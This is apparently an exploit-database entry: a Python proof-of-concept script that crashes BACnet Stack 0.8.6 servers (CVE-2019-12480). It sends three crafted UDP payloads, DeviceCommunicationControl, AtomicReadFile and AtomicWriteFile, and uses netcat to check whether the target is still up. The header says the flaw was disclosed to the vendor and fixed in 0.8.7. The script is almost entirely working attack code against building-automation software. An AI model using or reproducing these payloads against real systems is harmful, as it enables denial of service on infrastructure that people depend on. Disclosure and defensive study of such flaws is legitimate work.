Share
# Exploit Title: BACnet Stack 0.8.6 - Denial of Service  
# Google Dork: [if applicable]  
# Date: 2019-07-19  
# Exploit Author: mmorillo  
# Vendor Homepage: https://sourceforge.net/p/bacnet/  
# Software Link: https://sourceforge.net/projects/bacnet/files/bacnet-stack/bacnet-stack-0.8.6/  
# Version: bacnet-stack-0.8.6  
# Tested on: Linux  
# CVE: CVE-2019-12480  
  
#!/usr/bin/env python  
#   
# After reported the bug to the vendor, sharing details  
# about the vulnerability, as well as proof-of-concept code (exploit code to   
# test), has been release a fix for 0.8.7 release of   
# BACnet Protocol Stack https://sourceforge.net/p/bacnet/  
  
import socket  
import struct  
import argparse  
import os  
import sys  
from termcolor import colored  
  
#------------------------------------------------------------------------------  
# Command line parser using argparse  
#------------------------------------------------------------------------------  
  
def cmdline_parser():  
parser = argparse.ArgumentParser(conflict_handler='resolve', add_help=True,  
description='BACnet Protocol Stack Segmentation fault leading to denial of service', version='0.1',  
usage="python %(prog)s")  
  
# Mandatory  
parser.add_argument('Server', type=str, help='BACnet server IP')  
parser.add_argument('Port', type=str, help='BACnet port')  
  
return parser  
  
  
def get_Host_name_IP():   
try:   
host_name = socket.gethostname()   
host_ip = socket.gethostbyname(host_name)   
return host_ip  
except:   
print("Unable to get Hostname and IP")   
  
  
def target_alive(BACnetServer, BACnetPort):  
response = os.system("nc -u -z -w 1 " + BACnetServer + " " + str(BACnetPort))  
  
if response == 0:  
return True  
else:  
return False  
  
#------------------------------------------------------------------------------  
# Main of program  
#------------------------------------------------------------------------------  
  
def main():  
  
# Get the command line parser.  
parser = cmdline_parser()  
  
# Show help if no args  
if len(sys.argv) == 1:  
parser.print_help()  
sys.exit(1)  
  
# Get results line parser.  
results = parser.parse_args()  
  
BACnetServer = results.Server  
BACnetPort = int(results.Port)  
SRC_IP = get_Host_name_IP()  
  
if not target_alive(BACnetServer, BACnetPort):  
print((colored("[+] BACnet server down", "yellow")))  
  
else:  
if target_alive(BACnetServer, BACnetPort):  
  
payload_DeviceCommunicationControl = "\x81\x0a\x00\x16\x01\x04\x00\x05\x01\x11\x0d\xff\x80\x00\x03\x1a\x0a\x19\x00\x2a\x00\x41"  
  
print((colored("[+] Sending BACnet DeviceCommunicationControl payload from " + SRC_IP, "green")))  
  
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP  
s.connect((BACnetServer, BACnetPort))  
s.send(struct.pack('>I',len(payload_DeviceCommunicationControl)))  
s.send(payload_DeviceCommunicationControl)  
  
print((colored("[+] Sent Payload: " + payload_DeviceCommunicationControl.encode('hex') + ' to BACnet server ' + BACnetServer + ' port ' + str(BACnetPort), "yellow")))  
  
if target_alive(BACnetServer, BACnetPort):  
  
payload_AtomicReadFile = "\x81\x0a\x00\x1b\x01\x14\x00\x05\x01\x06\xc4\x02\x80\x00\x00\x0e\x35\xff\xdf\x62\xee\x00\x00\x22\x05\x84\x0f"  
  
print((colored("[+] Sending BACnet AtomicReadFile payload from " + SRC_IP, "green")))  
  
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP  
s.connect((BACnetServer, BACnetPort))  
s.send(struct.pack('>I',len(payload_AtomicReadFile)))  
s.send(payload_AtomicReadFile)  
  
print((colored("[+] Sent Payload: " + payload_AtomicReadFile.encode('hex') + ' to BACnet server ' + BACnetServer + ' port ' + str(BACnetPort), "yellow")))  
  
if target_alive(BACnetServer, BACnetPort):  
  
payload_AtomicWriteFile = "\x81\x0a\x00\x1b\x01\x04\x00\x05\x02\x07\xc4\x02\x80\x00\x00\x0e\x35\xff\x5e\xd5\xc0\x85\x0a\x62\x64\x0a\x0f"  
  
print((colored("[+] Sending BACnet AtomicWriteFile payload from " + SRC_IP, "green")))  
  
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP  
s.connect((BACnetServer, BACnetPort))  
s.send(struct.pack('>I',len(payload_AtomicWriteFile)))  
s.send(payload_AtomicWriteFile)  
  
print((colored("[+] Sent Payload: " + payload_AtomicWriteFile.encode('hex') + ' to BACnet server ' + BACnetServer + ' port ' + str(BACnetPort), "yellow")))  
  
if not target_alive(BACnetServer, BACnetPort):  
print((colored("[+] DoS completed", "red")))  
  
  
#------------------------------------------------------------------------------  
# Main  
#------------------------------------------------------------------------------  
  
if __name__ == '__main__':  
main()